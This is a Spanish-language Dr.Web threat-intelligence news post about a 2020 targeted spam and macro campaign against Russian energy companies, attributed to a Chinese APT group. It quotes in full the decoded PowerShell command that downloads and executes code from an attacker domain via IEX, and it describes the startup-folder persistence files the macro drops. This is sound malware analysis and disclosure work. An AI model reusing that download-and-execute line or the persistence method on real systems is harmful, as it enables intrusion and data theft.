Protege lo creado

Otros recursos

  • free.drweb-av.es — utilidades gratuitas, complementos, informadores
  • av-desk.com — un servicio en Internet para los proveedores de servicios Dr.Web AV-Desk
  • curenet.drweb.com — utilidad de desinfección de red Dr.Web CureNet!
Cerrar

Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte
Soporte 24 horas | Normas de contactar

Sus solicitudes

Perfil

Volver a las noticias

Las campañas spam espía dirigidas amenazan a las empresas de complejos de energía y combustible de Rusia

23 de septiembre de 2020

La empresa Doctor Web — desarrollador ruso de los medios de protección de información bajo la marca Dr.Web — informa sobre la detección de la campaña spam con elementos de ingeniería social dirigida a algunas empresas del conjunto de energía y combustible de Rusia.

Investigación

A finales de abril del año 2020 los analistas de virus de la empresa Doctor Web detectaron una campaña spam durante la cual al personal de algunas empresas del conjunto de combustible y energía de Rusia, camuflados por una guía telefónica actualizada, se les enviaban documentos con extensión .docx que descargaban dos imágenes desde los recursos remotos.

Una de ellas se descargaba al equipo de usuario desde el servidor news[.]zannews[.]com. Cabe destacar que el nombre de dominio es similar al dominio del centro de media anticorrupción de Kazajistán— zannews[.]kz. Por otra parte, el dominio usado enseguida permitió recordar otra campaña conocida del año 2015, llamadaTOPNEWS, donde se usaba el backdoor ICEFOG, y los dominios de administración de troyanos tenían una sublínea «news» en sus nombres. Otra peculiaridad era la siguiente: al enviar mensajes a varios destinatarios en las solicitudes de descargar imagen se usaban varios parámetros de solicitud o los nombres únicos de imágenes. Consideramos que el objetivo de todo esto era recopilar la información para detectar a un destinatario “seguro” que posteriormente seguramente abrirá el mensaje. Para descargar la imagen desde el segundo servidor se usaba el protocolo SMB, lo cual podía ser hecho para recopilar hashes NetNTLM desde los equipos del personal que abría el documento recibido.

#drweb

En junio de este año los malintencionados empezaron a usar el nuevo nombre de dominio — sports[.]manhajnews[.]com. Según el análisis, los subdominios manhajnews[.]com se usaban en los envíos spam como mínimo a partir del septiembre del año 2019. Así, uno de los objetivos en el marco de esta empresa era una universidad rusa importante.

Además, en junio fue lanzada otra campaña: esta vez, el documento contenía la información sobre el desarrollo del sector. Según el texto del mensaje, su autor no era ruso nativo. Así mismo, el servidor para descargar imágenes fue cambiado por download[.]inklingpaper[.]com

Como intento de esquivar la detección de los documentos maliciosos por los programas antivirus em julio los malintencionados empezaron a usar los documentos Microsoft Word cifrados con contraseña. Al mismo tiempo, el contenido del mensaje fue ligeramente cambiado:

#drweb

El texto era del mismo estilo, lo cual provocó más sospechas del destinatario. El servidor para descargar la imagen tampoco se cambió.

Cabe destacar que en todos los casos para enviar mensajes se enviaban los buzones de correo electrónico registrados en los dominios mail[.]ru и yandex[.]ru.

Ataque

A principios de septiembre del año 2020 los analistas de virus registraron otra campaña de spam durante la cual los malintencionados otra vez enviaban mensajes como si fueran una actualización de la guía telefónica. Pero esta vez el adjunto contenía un macro malicioso.

Al abrir el documento adjunto, el macro creaba dos archivos: VBS-script %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs destinado para iniciar el archivo de paquete, así como el archivo de paquete mismo %APPDATA%\configstest.bat ofuscado.

#drweb

Su funcionamiento es el siguiente: iniciar el shell con opciones determinadas. Las opciones transferidas al Shell se decodifican en los comandos siguientes:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Según los comandos mencionados, el dominio desde el cual se descarga la carga útil otra vez está camuflado por un sitio web de noficias. Al equipo infectado se entrega un descargador simple, la única tarea del cual es recibir el cCódigoshell del servidor administrative y su ejecución. Los expertos de la empresa Doctor Web consiguieron detectar dos tipos de backdoors que pueden ser instalados en el PC de la víctima.

El primero de ellos — BackDoor.Siggen2.3238 — anteriormente desconocido para nuestros expertos, así mismo, tampoco se detectaron algunas menciones de este programa por otros vendedores antivirus. El segundo es una modificación de un backdoor ya conocido por el incidente con la institución pública de Kazajistán, BackDoor.Whitebird. Además, durante la investigación detectamos otro dominio usado durante esta campaña, — news[.]microotf[.]com. Pero no detectamos ningún programa troyano que usara este dominio como servidor de control.

Resumen y conclusiones

El análisis de los documentos, malware, así como de la infraestructura usada nos permite detectar claramente que el ataque fue preparado por uno de los grupos APT chinos. Tomando en cuenta la funcionalidad de backdoors que se instalan en los equipos de las víctimas en caso de un ataque con éxito, la infección provoca como mínimo el robo de la información privada de los equipos de las empresas atacadas. Además, es probable la instalación de troyanos especializados en los servidores locales con función especial, tales como controladores del dominio, servidores de correo, Gateways Internet etc. Como hemos podido observar en un ejemplo del incidente en Kazajistán, estos servidores por varias razones son de interés especial para los malintencionados.

Los expertos del laboratorio de virus de Doctor Web informan a los usuarios sobre la necesidad de estar atentos al recibir correo, incluidos los mensajes recibidos de los remitentes supuestamente conocidos.

El adjunto que contiene el macro malicioso fue detectado correctamente por en analizador en la nube Dr.Web vxCube.

#drweb

Las descripciones técnicas detalladas del malware detectado están en la biblioteca de virus Dr.Web.

Indicadores del compromiso.

Nos importa su opinión

Por cada comentario se abona 1 punto Dr.Web. Para hacer una pregunta sobre la noticia para la administración del sitio web, indique al principio de su comentario @admin. Si su pregunta es para el autor de algún comentario - indique @ antes de escribir su nombre.


Otros comentarios

Desarrollador ruso de antivirus Dr.Web
Experiencia de desarrollo a partir del año 1992
Dr.Web se usa en más de 200 países del mundo
Entrega de antivirus como servicio a partir del año 2007
Soporte 24 horas

Dr.Web © Doctor Web
2003 — 2020

Doctor Web es un productor ruso de los medios antivirus de protección de la información bajo la marca Dr.Web. Los productos Dr. Web se desarrollan a partir del año 1992.

125124, Rusia, Moscú, c/3 Yamskogo Polya, 2, edif.12А